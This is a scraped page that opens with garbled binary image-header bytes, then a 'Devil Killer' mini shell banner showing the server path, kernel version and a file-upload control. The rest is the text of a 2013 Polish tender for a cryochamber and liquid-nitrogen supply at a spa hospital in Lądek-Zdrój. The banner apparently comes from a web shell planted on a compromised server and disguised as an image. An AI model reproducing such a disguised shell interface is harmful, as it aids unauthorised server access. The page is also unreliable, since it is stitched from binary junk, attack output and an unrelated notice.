JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/101515-N-2013.html

<p class="kh_header"><b>Lądek-Zdrój: Dostawa, montaż i uruchomienie kriokomory, dostawy ciekłego azotu wraz z dzierżawą zbiornika oraz przebudowa części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju</b><br>
<b>Numer ogłoszenia: 101515 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek-Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 74 8 115 470, faks 74 8 115 470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot Leczniczy- Spółka Akcyjna Województwa Dolnośląskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i uruchomienie kriokomory, dostawy ciekłego azotu wraz z dzierżawą zbiornika oraz przebudowa części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 11. Przedmiotem zamówienia jest: Dostawa, montaż i uruchomienie kriokomory, oraz dostawy azotu ciekłego wraz z dzierżawą zbiornika oraz przebudowa części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju w podziale na dwie części: 
Część 1) Dostawa, montaż i uruchomienie kriokomory, dostawa obuwia ochronnego oraz przebudowa części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju;
Część 2) Dostawy azotu ciekłego wraz z dzierżawą zbiornika.
AD.1) Przedmiot zamówienia obejmuje:
-  dostawę, montaż i  uruchomienie 2-3 osobowej kriokomory w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju przy ul. Wolności 4a (opis zawiera zał. nr 3 do SIWZ). Montaż obejmuje wykonanie wszystkich niezbędnych prac instalacyjnych zgodnie z projektem Zamawiającego. Poprzez uruchomienie rozumie się przyłączenie zamontowanej w pomieszczeniu kriokomory do zbiornika kriogenicznego za pomocą instalacji łączącej komorę ze zbiornikiem. W ramach przedmiotu zamówienia Wykonawca również przeszkoli personel w siedzibie Zamawiającego.
-  dostawę obuwia ochronnego (opis zawiera zał. nr 3 do SIWZ).
- przebudowę części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju. Przebudowa dotyczy pomieszczeń  nr  20, 21, i 22 (zaznaczone kolorem - zał. nr 2b do SIWZ) oraz wykonanie fundamentu pod zbiornik azotu,  przejścia przez hol z przewodami łączącymi kriokomorę ze zbiornikiem oraz zasilania zbiornika azotu. Szczegółowy opis przedmiotu zamówienia w zakresie przebudowy pomieszczeń określają załączniki do Specyfikacji Istotnych Warunków Zamówienia:
1.	Przedmiar robót - zał. nr 2,
2.	Projekt zagospodarowania terenu- zał. nr 2a,
3.	PT Architektura - zał. nr 2b,
4.	PT instalacje sanitarne - zał. nr 2c,
5.	PT instalacje elektryczne - zał. nr 2d,
6.	Specyfikacja techniczna wykonania i odbioru robót - ogólna i budowlana - zał. nr 2e,
7.	Specyfikacja techniczna wykonania i odbioru robót - branża  sanitarna- zał. nr 2f,
8.	Specyfikacja techniczna wykonania i odbioru robót elektrycznych i elektroenergetycznych - zał. nr 2g.
Przedstawione powyżej dokumenty dotyczą całego zamierzenia inwestycyjnego, jakie planuje Zamawiający, jednak niniejsze postępowanie dotyczy wyłącznie zakresu prac wskazanego w akapicie poprzedzającym, zgodnie z opisem określonym w zał. nr 2 do SIWZ.
 Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów  niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. Pod pojęciem parametry rozumie się funkcjonalność, przeznaczenie, kolorystykę, strukturę, materiały, kształt, wielkość, bezpieczeństwo i wytrzymałość.
AD.2) Przedmiot zamówienia obejmuje:
- sukcesywne dostawy ciekłego azotu do Szpitala Uzdrowiskowego Jubilat oraz dzierżawę zbiornika kriogenicznego. Opis przedmiotu zamówienia zawiera zał.  nr 3c do SIWZ.
- dostawa-transport, instalacja i dzierżawa zbiornika na azot ciekły o pojemności około: 6000 litrów. Zbiornik fabrycznie nowy o wymiarach około wysokość 580 cm, średnica 180 cm, ma być posadowiony na fundamencie wykonanym zgodnie z dokumentacją projektową, będącą załącznikiem do SIWZ. Wymagane jest załączenie karty oferowanego zbiornika.

1. Przewidywana ilość dostaw ciekłego azotu do zasilania kriokomory ok. 120 000 kg w okresie obowiązywania umowy. Ilości ciekłego azotu podane w formularzu cenowym stanowiącym załącznik nr 1b do SIWZ  przyjęte zostały na podstawie planowanego zużycia w okresie 24 miesięcy i mogą one ulec zmianie w trakcie obowiązywania umowy.
Zamawiający zaleca dokonanie wizji lokalnej.
Zakres zamówienia zawiera się w kwocie poniżej progów  ustalonych na podstawie art. 11 ust.  8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych        ( tekst jednolity Dz.U.2010r., Nr 113, poz. 759 z późn. zm. zwanej dalej Pzp).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 44.61.00.00-9, 51.81.00.00-3, 24.11.18.00-3, 45.10.00.00-8, 45.11.12.20-6, 45.26.25.20-2, 45.41.00.00-4, 45.43.21.20-1, 45.43.12.00-9, 45.44.21.00-8, 45.33.12.10-1, 45.42.10.00-4, 45.23.24.60-4, 45.31.00.00-3, 45.33.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:
- dla części 1: w wysokości: 3 000,00 zł (słownie: trzy tysiące złotych);
- dla części 2: w wysokości: 1 000,00 zł (słownie: jeden tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna:
1)	Dla części 1 i 2 : przedłożenie oświadczenia o posiadaniu uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania wg zał. nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie warunku uzna:
1)	Dla części 1: 
- wykazanie się wykonaniem minimalnie jednej dostawy polegającej na dostawie, montażu i uruchomieniu kriokomory minimalnie 2-3 osobowej zasilanej ciekłym azotem, w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz załączeniem dowodu (minimalnie jednego), że  dostawa została wykonana należycie  (wg zał. Nr 6 do SIWZ). 
- wykazanie się wykonaniem  minimalnie jednej roboty budowlanej polegającej na:  budowie, przebudowie lub remoncie obiektu budowlanego o wartości robót min. 180 000,00 zł brutto, słownie: sto osiemdziesiąt  tysięcy złotych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz załączeniem dowodu  ( minimalnie jednego) określającego czy roboty te zostały wykonane w sposób należyty oraz wskazujący czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (wg zał. Nr 6a do SIWZ).
2) Dla części 2: 
- wykazanie się wykonaniem dostawy minimalnie jednej, polegającej na dostawach ciekłego azotu o wartości brutto co najmniej: 120 000,00 zł brutto, słownie: sto dwadzieścia tysięcy zł, w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, oraz załączeniem dowodu (minimalnie jednego), że te dostawy zostały wykonane  należycie (wg zał. Nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu potencjału technicznego pozwalającego na wykonanie zamówienia wg zał. nr 4 do SIWZ- dla części 1 i 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Dla części 1: wykazanie się przez Wykonawcę dysponowaniem na czas realizacji zamówienia: a) osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi wg zał. Nr 6b do SIWZ;
b) przedłożenie oświadczenia, że wymieniona osoba, posiada wymagane uprawnienia wg zał. Nr 6b do SIWZ;
     2) Dla części 2: przedłożenie oświadczenia o dysponowaniu osobami zdolnymi do wykonania zamówienia wg zał. nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o znajdowaniu się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia wg zał. nr 4 do SIWZ- dla części 1 i 2 .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- Wykonawca musi wykazać się wykonaniem minimalnie jednej roboty budowlanej polegającej na:  przebudowie lub remoncie obiektu o wartości robót min. 180 000,00 zł brutto, słownie: sto osiemdziesiąt  tysięcy złotych oraz załączeniem dowodu  ( minimalnie jednego) określającego czy roboty te zostały wykonane w sposób należyty oraz wskazujący czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone- dotyczy części 1 zamówienia;;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- Dla części 1: wykazanie się wykonaniem minimalnie jedną dostawą polegającą na dostawie kriokomory minimalnie 2-3 osobowej zasilanej ciekłym azotem  oraz załączeniem dowodu (minimalnie jednego), że  dostawa została wykonana  należycie. 
 -Dla części 2: wykazanie się wykonaniem dostawy minimalnie jednej, polegającej na dostawach ciekłego azotu o wartości brutto co najmniej: 120 000,00 zł brutto, słownie: sto dwadzieścia tysięcy zł, oraz załączeniem dowodu (minimalnie jednego), że te dostawy zostały wykonane  należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikat CE lub Deklaracja zgodności lub równoważne (dotyczy części 1 dostawa kriokomory i obuwia ochronnego).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany formularz ofertowy - wg  zał. nr 1,
2.	Wypełniony i podpisany formularz cenowy - wg zał. nr 1a,
3.	Wypełniony i podpisany formularz cenowy -wg zał. nr 1b,
4.	Kosztorys ofertowy Wykonawcy opracowany metodą kalkulacji szczegółowej zgodnie z założeniami określonymi w Specyfikacji Istotnych Warunków Zamówienia -  rozdział XVIII pkt.2. 
5.	Wypełnione i podpisane warunki graniczne dotyczące kriokomory - zał. nr 3a,
6.	Podpisane warunki gwarancji - zał. nr 3b,
7.	Dokument potwierdzający, że oferowane urządzenia są dopuszczone do obrotu na terenie RP i spełniają wymogi ustawy z dnia 20 maja 2010r. o wyrobach medycznych Dz. U. Nr 107, poz. 679 ze zm., np. wpis do rejestru wyrobów medycznych (dotyczy dostawy kriokomory),
8. Karta oferowanego zbiornika,
9. Foldery dotyczące oferowanej kriokomory,
10.	Dokument lub pełnomocnictwo, z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania wykonawcy, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany postanowień umowy dla części 1 wg zał. nr 5 do SIWZ:
a) Zmiana terminu realizacji przedmiotu umowy określonego w umowie w przypadku wystąpienia opóźnień wynikających z:
- wstrzymania robót przez zamawiającego,
- konieczności usunięcia błędów, wad lub wprowadzenia zmian w projekcie lub specyfikacji technicznej wykonania i odbioru robót,
- wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
- wystąpienia robót dodatkowych, które nie zostały ujęte w § 6 ust. 3 niniejszej umowy, a które są konieczne do wykonania ww. zamówienia. 
Przesunięcie terminu będzie musiało być szczegółowo uzasadnione przez wykonawcę i zaakceptowane przez zamawiającego, z wyjątkiem tiretu pierwszego i drugiego.
- zamawiający ma możliwość przedłużenia terminu realizacji niniejszej umowy z przyczyn nie leżących po stronie wykonawcy.
- w wyniku zmiany przepisów prawnych lub ich braku oraz ewentualnych trudności w ich interpretacji przez organy administracji publicznej,
b)Zmiana wynagrodzenia:
-  z powodu zmiany obciążeń publiczno prawnych (np. zmiana stawki podatku VAT).
Zamawiający dopuszcza następujące zmiany postanowień umowy dla części 2 wg zał. nr 5a do SIWZ:
a) zmiana stawki VAT na przedmiot umowy zgodnie z § 1 pkt. 6 i 7 umowy,
b)  gdy zachodzi konieczność zmiany terminu wykonania zamówienia z przyczyn leżących po stronie Zamawiającego;
c) gdy zachodzi konieczność zmiany terminu wykonania zamówienia w wyniku okoliczności, których nie można było przewidzieć w chwili podpisania umowy,
c) zmiana polegająca na wydłużeniu okresu gwarancyjnego,
3. Zamawiający ma możliwość przedłużenia terminu realizacji niniejszej umowy z przyczyn nie leżących po stronie wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek -Długopole S.A.
ul. Wolności 4
57-540 Lądek Zdrój
pok. nr 4 Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 11:00, miejsce: Uzdrowisko Lądek -Długopole S.A.
ul. Wolności 4
57-540 Lądek Zdrój
pok. nr 105 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt.: Dolnośląskie Centrum Diagnostyki i Terapii Osteoporozy w Lądku Zdroju
realizowany jest w ramach działania:
Priorytet I Wzrost konkurencyjności dolnośląskich przedsiębiorstw,
Działanie 1.1. Inwestycje dla przedsiębiorstw,
Schemat 1.1.D2- Dotacje inwestycyjne dla przedsiębiorstw prowadzących działalność uzdrowiskową.</p>
